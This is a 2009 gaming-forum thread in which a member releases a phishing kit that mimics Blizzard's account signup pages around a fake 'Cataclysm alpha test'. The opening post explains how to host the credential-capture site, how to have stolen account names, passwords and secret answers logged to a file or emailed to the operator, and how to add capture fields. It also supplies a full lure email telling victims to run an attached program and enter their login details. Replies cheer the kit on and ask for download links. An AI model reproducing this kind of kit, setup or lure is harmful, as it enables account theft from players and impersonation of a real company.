[Release//UPDATED] WoW: The Catalysm - Phisher and BlizzLike Website Template Files menu


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    Giblets123's Avatar Member
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    [UPDATED 07/07/09] WoW: The Catalysm - Phisher and BlizzLike Website Template Files

    Okay, I'm going to start off by saying sorry for the heavy use of imagery. I had a very clear picture in my mind of how I wanted to get this across, and i'm afriad your just going to have to deal with it!
    Total image size for this post is like 1.5mb

    Now this my first contribution to MMOwned. So please.. Be gentle.

    What you see is a graphical template idea of a website that looks just like the blizzard "new account signup" and "account management" pages. Its not using anything to do with battlenet as there are loads of these about already. I dont have my account linked with battlenet and I think most of the EU dont atall so w.e lets just carry on.

    Not only is this a graphical template idea for you to update do as you please which isnt my responsibility, there is a Scamming idea for you to bust out aswell, which again isn't my fault what you do with it. I suggest reading this post before going much further, if you dont know what WoW Cataclysm is already.

    WoW.COM - Blizzard Files Trademark for "Cataclysm"
    Blizzard files trademark for "Cataclysm"

    Now, whether this is true or not, who cares. Its there. Shit loads of people are gunna have read that. So you might blast them with emails saying "congrats chump your chosen for the catalyst alpha tests". Strike whilst the irons hot, right?
    Also I hear from the WoW Lore nerds out there that is highly likely to actually be the next expansion? Bleh who cares they're trashing the game anyway. Who knows. You download it, you do what you like with it.

    So the graphical template idea is all set up with wording, a pretty convincing logo, new version at page 6, and all other shitz you need to get going, should you wish to use the graphical template idea

    Okay enough text. Lets show you what we got:

    Cool. So now your interested huh? Or maybe not and you've just hit the back button. You can download the graphical template idea website files by clicking here. The file is 1.5mb because I have included some photoshop source files if you need them for any reason. There IS a readme in the zip document, but I will post some info's here because you'll see just how easy it is to customize.

    This is an udated version. See bottom of the thread for details..

    » Download BlizzLike Template

    Please note that if I see exessive leeching with no thankyou's then ill be taking it off public downloads and you'll have to wait for my lazy ass to send it to you, so don't ruin it for everyone else!

    Installation Instructions
    1. Get yourself a web host which allows PHP. If your having problems problems with anything AIM: z3r0effects or email [email protected]
    2. Open settings.php, and choose whether you wish to log the information in a text document or have the captured information emailed to you by editing the "$modify" string to:
      1 for text log
      2 for email
      Note: If you have chosen email modify the to address and subject at lines 23 - 24.
    3. Whilst you have settings.php open, you can choose whether you wish to have the "secret questions and answers" section enabled. Change line 14 to 1 for it turned ON and 2 for it to be turned OFF
    4. Save the modified settings.php
    5. Upload all files onto your new webhost and enjoy.

    Web Form Customization
    Customizing the account capture form is simple and easy. All you need to do is copy/paste one of the previous inputs and change the attributes, the code looks like this:

    <input name="Account Name" type="text" width="300" taborder=1 class="txtbox required"/>

    You will need to modify where it says "Account Name" (highlighted). Change this to anything. For example if you are adding a telephone number box, you would change this to Telephone:

    <input name="Telephone" type="text" width="300" taborder=1 class="txtbox required"/>

    If you want a required field, leave the "required" part in the class attriube. If not, remove it.

    So our new field for telephone that is NOT required would look like:

    <input name="Telephone" type="text" width="300" taborder=5 class="txtbox"/>

    Once you are done editing, save, upload, test. The script should pickup any new additions automatically and be fired along to the specified email address / be added to the text document.

    With regards to the form validation. I have used a jQuery script that I did not write myself but is ideal for this and makes all our lifes easier. By simply giving a form input a class of "required", the javascript does the rest. Documention on this for help with select boxes, radiobuttons, etc can be found by clicking here.

    Further Customization
    So basically you can do whatever you like to this. All you need is a basic HTML editor, and even people with the most basic of HTML knowledge can throw together a, hopefully, very convincing website.

    Executable File
    This was my first VB program, and it was built as a demo of what it could look like and how it works.

    I am not putting this out for free downloads. If you want this, please contact me via PM. Im not really releasing this anymore. But can do on certain.. terms? 6): PM me.

    Screenshots of this little baby:


    In action:

    The Email
    Okay so this email is floating around all over MMOwned but I'll put it here for you lazy SOB's who CBA to make a few clicks
    Edit as appropriate..
    The Cataclysm™ alpha Test
    You have been selected to participate in the alpha test of World of Warcraft®: The Cataclysm™. Welcome!
    In the alpha test you’ll get an opportunity to test the first zones of the new The Cataclysm zone, and the new levels above 80. We look forward to your feedback on the overall experience, including quests, monsters, zones, aesthetics, and more. We would also appreciate reports on any bugs you may encounter. These can be logged using the /bug command explained below.
    Getting started:
    In order to participate in the alpha test, you must upgrade an existing retail account that has been upgraded with the Wrath of the Lich King®, allowing you to connect to the The Cataclysm alpha™ test realms. The World of Warcraft®: the Wrath of the Lich King® game client that you use must be patched up to version 3.1.2 or later in order to install the alpha test client.
    To begin please extract the attached folder to your World of Warcraft directory. Once extracted run the program, if you are currently using Windows Vista™ you will need to run the program as an administrator.
    Please be prepared to enter the current retail World of Warcraft account name and password you use, and the appropriate information to authenticate your eligibility to connect to the The Cataclysm alpha test realms. To participate in the alpha tests, you must have a valid retail World of Warcraft account active and in good standing as of March, 1st 2009.
    Your Cataclysm Alpha Key:
    If you are having trouble downloading the attached alpha please download it from any of our alpha mirror sites.
    - The alpha mirror sites listed below are not hosted or endorsed by Blizzard Entertainment, and Blizzard Entertainment does not guarantee that the files available on these websites will operate properly with Blizzard's World of Warcraft software product. If you encounter any problems whatsoever in obtaining these files, please contact the hosting website.
    Wrath of the Lich King to The Cataclysm Alpha
    :::: Add your file download here :::::
    Sending us feedback:
    Typing /bug in chat will open an error reporting interface, and we encourage you to use it any time you encounter a problem or want to send us a suggestion.
    If you experience any difficulties installing the alpha game client, or have problems connecting to the test realms, please contact Technical Support either by posting on the appropriate forum at World of Warcraft - English (NA) Forums -> or by email at [email protected]. Please remember that this software is still undergoing development, so any in-game issues should be reported using the /bug feature.

    Bugs, Known Issues and Space for FAQ
    If you see any problems or anything let me know so I can update asap..

    Giblets' (Aka z3r0effects) - "Final Thoughts"
    This was a long post, but thank you for reading. I hope this helps.
    If I've missed anything, do let me know! If you have anything you think would make this better, or ideas w.e just let me know.

    If you got some ideas and want me to work with on trying to get some more authentic looks i'm happy to help. Just contact me .

    I'd like to make this clear: I dont really do scamming, I dont have a stack of email address.

    Thanks dudes!

    Newest version for download now includes:

    settings.php - Moved all the stuff that needs to be configured to a settings.php file so's that its hopefully a little more structured.

    Secret Questions/Answers - You can now turn secret questions/answers off. Some of you requested it some didnt.

    Username / Password checking - This will now check the format of the password to ensure it contains letters AND numbers, and that the username is between 3 and 16 character. This WILL NOT test to see if that information actually exists

    Confirm emails - If the email in the confirmed box doesn't match that in the email box, it'll let your idiot know that.

    Buttons - I've included the source photoshop file for the buttons in the zip, so you can reword them for any future scams you may be doing.

    Previous Updates included:

    "Choose your method.." - Choose whether you want to have it saved as a text document or have it mailed to you. Useful for those of you on free hosts

    "Alpha Key" - The alpha key is now set to be required.

    "The Continue Button" - The button is hidden until you match the captcha letters (which are always the same for every person, but it gives the right feel).

    This was built for artistic purposes and anything you do with it is not my responsibility.
    Last edited by Giblets123; 07-16-2009 at 08:28 AM. Reason: Updated stuffs

    [Release//UPDATED] WoW: The Catalysm - Phisher and BlizzLike Website Template Files
  2. #2
    Bad's Avatar Active Member
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    Giblets123 this looks AMAZING! Good work =D shame i dont know anything about this kind of stuff

    "Congratulations! Your officially an idiot!"

    Made me laugh

    Last edited by Bad; 07-05-2009 at 10:19 AM.

  3. #3
    [Scream]'s Avatar Contributor CoreCoins Purchaser
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    This looks very very good, +Rep from me!

  4. #4
    Slagg90's Avatar Member
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    This looks awesome, PM sent for the download link +Rep
    Really nice pictures and all!

  5. #5
    Kaidos's Avatar Contributor
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    One word: Epic.

    +2 repz!

  6. #6
    Tierman's Avatar Active Member
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    Love it. +rep and PM sent.


  7. #7
    Dombo's Avatar Banned
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    Dude, you totally broke my scroll wheel .. *sad face*

  8. #8
    Giblets123's Avatar Member
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    Thanks guys, alot of interest already. Wasnt expecting it! .

    I'm just working on a quick fix for those of you using free hosting that doesnt allow the mail function. It'll just write it to a .txt document like most of the other ones out there. Will keep you posted.

  9. #9
    Henessy's Avatar Contributor
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    OMFG This is EPIC! +REP!

  10. #10
    pauk's Avatar Contributor
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    Why would you make a the logo red when catalysm is an water thingy

  11. #11
    Giblets123's Avatar Member
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    I tried it as Grey, but it looked a little boring..

    Sure, blue would be more "fitting" considering that yes it is slap bang in the middle of azeroth, but blue was used in first wow, and now also in wotlk. So I just went for something that I thought was visually eye catching, the more "coool" it looks the more they might just actually do it.

  12. #12
    7upisnice's Avatar Member
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    Wow this is epic.

  13. #13
    majinbuu1023's Avatar Contributor
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    Damnit, I made my own cataclysm phisher about 2 days ago, now other people know about it, everyone will know is a scam

  14. #14
    Reflection's Avatar Legendary
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    I never scam but I just gotta say this. Very impressing, good work. I don't like the logo subtext though. Looks fake.

    Freelance Digital Artist
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  15. #15
    Giblets123's Avatar Member
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    Originally Posted by majinbuu1023 View Post
    Damnit, I made my own cataclysm phisher about 2 days ago, now other people know about it, everyone will know is a scam
    Sorry dude! It was only a matter of time i guess

    Originally Posted by Reflection View Post
    I never scam but I just gotta say this. Very impressing, good work. I don't like the logo subtext though. Looks fake.
    Hm I can kinda see what your saying. Without actually having the really blizzard font and working with things other people have put together (i'm no font artist) you just gotta work with what you got. I might have a go at making feel "more at home".

    Updated stuffs - Updates the bits as promised.

    Tomorrow I shall be working on the password checker, confirm email address, etc. Keep your eyes peeled :P Dont forget it doesnt just need to be for "wow cataclysm" it could be for anything else.
    Last edited by Giblets123; 07-05-2009 at 01:57 PM. Reason: updated

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